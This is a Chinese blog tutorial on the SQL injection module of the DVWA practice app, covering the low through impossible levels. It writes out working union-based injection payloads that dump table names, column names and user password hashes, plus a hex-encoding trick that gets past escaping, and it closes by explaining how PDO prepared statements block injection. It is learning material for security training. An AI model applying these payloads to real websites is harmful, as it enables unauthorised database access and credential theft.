关于DVWA的学习-SQL注入

已于 2022-04-21 21:12:31 修改
阅读量3.6k 收藏 7
点赞数 1
分类专栏: DVWA学习 文章标签: sql 网络安全 安全
于 2022-04-20 14:08:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sofreshcoder/article/details/124294177
版权

关于DVWA的学习-SQL注入

low

Background

  • 一般的查询语句的结构如下:

SELECT column_name FROM table_name WHERE ID=$id
我们输入的内容就是填充到id

需要先简单介绍一下数字型和字符型注入的基本区别:

  • 数字型:输入啥就是啥,比如我输入1,后台的查询语句就是SELECT column_name FROM table_name WHERE ID=1
  • 字符型:会给输入套上单或双引号,同样输入1,后台的查询语句就是SELECT column_name FROM table_name WHERE ID=‘1’(sql中单双引号都有可能,需要自己尝试一下得知)。

  • sql中的注释符号:#, /**/, –
    (在简单题目中一般只用到#)

  • 常用的函数(仅针对dvwa用到的):
    version() : 获取版本号
    database() : 获取当前数据库名称
    group_concat() : 将多个string以逗号为分隔符连接
    关于information_schema存储的数据(根据自己理解画的)
    自己理解的

  • 关于select1,2,3的作用

先验证是否为数字型注入

在题目中,我们可以看到输入数字之后可以得到不同用户的first_name和last_name:
显示姓名

输入1+1得到的结果:
在这里插入图片描述
显然不是数字型注入

验证是否为字符型输入

输入 'or 1=1#,若是字符型输入,此时的查询语句变为SELECT column_name FROM table_name WHERE ID=’‘ or 1=1#',后面判断为永真,会输出所有信息。

在这里插入图片描述
确实为字符型注入

判断列数

利用order by语句判断列数
(order by 2即按照第二列value值顺序排列)

在这里插入图片描述
在这里插入图片描述
判断出有三列

判断回显

语句: 1’ union select 1,2#
(Background部分有说明)

在这里插入图片描述

利用information_schema获取数据

  1. 1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()# (获取当前数据库的所有table name)
    在这里插入图片描述

  2. 1’ union select 1, group_concat(column_name) from information_schema.columns where table_name=‘users’# (获取uses表中所有列名)
    在这里插入图片描述

  3. 1’ union select user,password from users# (获取密码)
    在这里插入图片描述

medium

在这里插入图片描述
明显需要抓包,打开代理(127.0.0.1,8080)即可使用burpsuite抓包。

1 or 1=1

在这里插入图片描述

1 or 1=2

在这里插入图片描述
为数字型输入。

后续除了最后一步之外都和low级别题目一致

最后一步输入 1 union select 1, group_concat(column_name) from information_schema.columns where table_name=‘users’ 会显示error
为了方便解释这里直接查看PHP源码:

> $id = mysql_real_escape_string( $id );

关于mysql_real_escape_string()函数的解释

常见的sql注入防御以及绕过措施

简单来说,该函数过滤了单引号,用于防止sql注入,因此采用十六进制数 (0x7573657273)来代替‘users’字段。

最终输入:1 union select 1,group_concat(column_name) from information.columns where table_name=0x7573657273

在这里插入图片描述

1 union select user,password from users 获得密码
在这里插入图片描述

high

除了不会提示具体error原因之外,别的都和第一题的字符型注入没有区别。
需要注意的是SQL语句中多了一个limit关键词:

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";

MySql中limit和offset的基本用法

关于union和limit共同使用时应注意的问题

impossible

在网上搜了一下,maybe,真的是impossible进行sql注入的。
采用的叫做PDO技术

PDO技术:PHP数据对象(PHP Data Object)。在生成网页时,许多PHP脚本通常都会执行除参数之外其他部分完全相同的查询语句,针对这种重复执行一个查询,每次迭代使用不同的参数情况,PDO提供了一种名为预处理语句(prepared statement)的机制。它可以将整个SQL命令向数据库服务器发送一次,以后只有参数发生变化,数据库服务器只需对命令的结构做一次分析就够了,即编译一次,可以多次执行。会在服务器上缓存查询的语句和执行过程,而只在服务器和客户端之间传输有变化的列值,以此来消除这些额外的开销。这不仅大大减少了需要传输的数据量,还提高了命令的处理效率。可以有效防止SQL注入,在执行单个查询时快于直接使用query()或exec()的方法,速度快且安全,推荐使用。

在这里插入图片描述
其中,prepare()函数相当于准备好一个PDO对象,并对于其中SQL语句进行了预编译,后面的bindParam()函数用于传入一个INT型的变量。
也许这种解释并不能理解为什么PDO可以防止sql注入,看了很多的博客之后,大概总结一下中心思想:
预编译之后相当于固定了SQL语句的语义,也就是说,我们若想进行注入攻击,这本质上是需要改变原本的SQL语义来完成的,但这在语句被预编译之后是无法实现的(除非再编译一次),因此,杜绝了SQL注入攻击。

关于PDO中的quote方法,占位符,bindParam函数等介绍

一般情况下,PHP代码中使用了PDO就可以宣告无法注入了,但是:
使用了PDO依旧有攻击可能的例子(目前还看不懂hh)

江畔有雨
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DVWA-SQL注入
WY92139010的博客
05-03 947
DVWA-SQL注入 一、SQL注入概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三、DVWA注入分...
适合DVWASQL-li-lab的PHPStudy、DVWASQL-li-labs
03-26
SQL-li-labs则是针对SQL注入攻击的练习平台,帮助学习者理解如何预防这种类型的攻击。 首先,我们来详细了解一下PHPStudy。PHPStudy提供了一个简单的界面来管理PHP版本切换、Apache和Nginx服务器的启动与停止,以及...
DVWASQL注入(低中高级)
qq_43455259的博客
01-20 4784
dvwasql注入
DVWA-SQL注入(SQL Injection)低 中 高级别_dvwa sql注入低中高代码分析
最新发布
2401_84968101的博客
05-12 272
后端代码从session中获取用户输入的参数,并根据用户ID获取用户信息并回显到页面中,有回显,可以使用。使用MySQL的Hex函数编译需要查询的表名,并在结果前面加上0x,从而绕过特殊字符转译,使用抓包软件拦截POST请求,修改参数,使用联合注入构造payload,根据输入的用户ID查询用户信息并在页面中回显,有显示位,可以使用。,并且执行SQL之前没有对用户输入的参数进行过滤,源码如下。medium级别使用下拉框提交数据,请求方式为。将表名也使用MySQL的Hex()转译,,需要抓包来修改提交的参数。
DVWA (Dam Vulnerable Web Application)中级SQL注入实战
baidu_33260220的博客
11-07 4680
1、输入’ or 1=1 #  ,发现’被转义成\’    ‘ “  \ 都被转义加\ 2、输入1 or 1=1 #  ,发现有数字型注入  3、输入1 order by 2判断有两个字段,输入1 union select 1,2 #判断两个字段都可以代入参数进行查询     4、输入1 union select user(),datab
dvwa——sql注入
GZY0601的博客
09-16 601
Hello!转眼一看距离我上次发文章都是一年前的事情了,中职的第三年都一直备赛的路上,一次比了三个项目,搞得学的好乱,现在上了大学,开始回来复习安全的东西,说实话好久没练了很多基本的东西都忘记了,去年就一直说要写dvwa的教程,现在刚好算是可以边复习边更新。哈哈哈哈哈哈!SQL注入是一种常见的网络安全漏洞和攻击方式,它利用应用程序对用户输入数据的处理不当,使得攻击者能够在执行SQL查询时插入恶意的SQL代码。通过成功注入恶意代码,攻击者可以执行未经授权的数据库操作,获取敏感信息、篡改数据甚至完全破坏数据库。
漏洞防范:搭建漏洞靶场DVWA,DVWASQL注入漏洞,利用sqlmap把复杂的程序自动化
weixin_52371314的博客
10-12 1906
sql注入漏洞
DVWA-master.zip
01-04
DVWA的"SQL注入"部分,你可以尝试通过构造恶意输入来操纵数据库查询,以获取敏感信息或执行非授权操作。这涵盖了盲注、时间基注入和错误回显等多种方法,有助于理解SQL注入的危害和防御手段。 3. **跨站脚本...
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
DVWA-master.7z 压缩包
09-14
- SQL注入:通过构造特定的输入,攻击者可以执行恶意的SQL命令。 - 跨站脚本(XSS):攻击者通过在网页中插入恶意脚本,使用户浏览器执行。 - 跨站请求伪造(CSRF):攻击者利用用户的已登录状态,诱使用户进行非...
自学渗透测试:使用 DVWASQLmap 探寻 SQL 注入攻击与防范
weixin_43263566的博客
01-04 2553
SQL注入漏洞
DVWAsql注入——联合注入和报错注入
Williamanddog的博客
12-20 1893
构造payload:1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)))#使用格式:updatexml(xml_document,xpath_string,new_value),作用是将document的中符合string 的字符串替换为value的值。
DVWA-SQL注入(全级别)
小纯的博客
02-08 6344
一、SQL注入概念 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 ...
欢迎来到训练场,SQL注入DVWA靶机
sinat_35855737的博客
05-11 995
手把手带你飞,在DVWA靶机上练习sql注入
DVWA SQL注入
m0_55605024的博客
03-01 499
简而言之,是在输入字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些。如:将'dvwa'替换为database() or 替换为0x64767761(将'dvwa'进行16进制编码)2.安装kali操作系统,kali自带sqlmap,可以直接输入sqlmap执行。注入进去的恶意指令就会被数据库误以为是正常的SQL指令而运行。--dbs:database serve 获取所有的数据库名。database():返回当前数据库的名称。防御命令执行的最高效的方法,就是。
DVWA靶场下的sql注入之文件读写
waxcj的博客
05-09 1283
DVWA的安装配置在我上一篇文章上写过了,不知道的可以去看看,这里直接讲sql注入如何获得文件读写权限 sql注入读写的根本条件 1:数据库用户得是高权限用户(root) 2:数据库下的secure_file_priv不是null(如果是也可以通过其他方法读取和写入,后文会讲,可以在MySQL命令行中用这条语句查看secure_file_priv是否为null SHOW VARIABLES LIKE "secure_file_priv"; 如果为null,我们可以在D:/phpstudy/.
DVWA-WEB漏洞系列之SQL注入
woo233的博客
08-09 3346
用户输入数据为 1’ and 1=1#,这时SQL语句发生变化,在原有查询完成后会判断 1=1,如果判断正确则才会有输出[#作用是注释(移除)后续SQL语句]在用户输入中依次增加order by后面的数据,当在输入为 1’ order by 3#时网页出现报错,证明该数据库有2列/字段。攻击者在HTTP请求中注入恶意的SQL代码,服务器使用参数构建数据库SQL命令时,恶意SQL被一起构造,并在数据库中执行。防御SQL注入:使用PDO,配合正确的过滤和sql语句就可避免SQL注入漏洞的产生。...
DVWA中的SQL注入攻防实战指南
"DVWA(Damn Vulnerable Web ...DVWASQL注入练习帮助我们理解攻击者的思路,提高对SQL注入漏洞的认识,并学习如何防止这类攻击。通过这样的实践,我们可以提升Web应用的安全性,避免潜在的数据泄露和系统破坏。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

江畔有雨

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值